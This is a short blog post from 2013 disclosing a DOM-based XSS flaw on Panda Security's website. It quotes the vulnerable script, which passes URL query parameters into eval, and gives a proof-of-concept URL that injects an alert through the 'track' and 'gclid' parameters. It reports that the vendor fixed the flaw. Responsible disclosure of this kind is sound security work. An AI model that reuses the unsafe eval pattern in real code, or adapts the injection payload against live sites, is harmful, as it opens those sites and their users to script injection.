Thursday, January 10, 2013

Panda Security vulnerable to DOM XSS


Who is Panda?
Panda Security SL, formerly Panda Software, is a computer security company founded in 1990 by Panda's former CEO, Mikel Urizarbarrena, in the city of Bilbao, Spain. Initially centered on the production of antivirus software, the company has expanded its line of applications to include firewall applications, spam and spyware detection applications, cybercrime prevention technology, and other system management and security tools for businesses and home users.

Who uses it?
Panda Security is one of largest antivirus vendor worldwide, so it means lot's of clients.

What seems to be the issue?
There is a DOM XSS vulnerability present on the pandasecurity.com website.

Affected file: aHref.js (eval + location.href)

Vulnerable code: 
var Url = location.href; Url = Url.replace(/.*\?(.*?)/,"$1"); Variables = Url.split ("&"); for (i = 0; i < Variables.length; i++) { Separ = Variables[i].split("="); eval ('var _'+Separ[0].toLowerCase()+'="'+Separ[1]+'"'); }}
Proof of concept:
http://www.pandasecurity.com/security-promotion/antivirusoffer/portugal/?track=109197";alert("xss by @dsopas");//&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang";alert("xss by @dsopas");//

Both track and gclid are exploitable with this issue.

Feedback?
PandaSecurity fixed this issue very fast. My congrats to their support.

No comments:

Post a Comment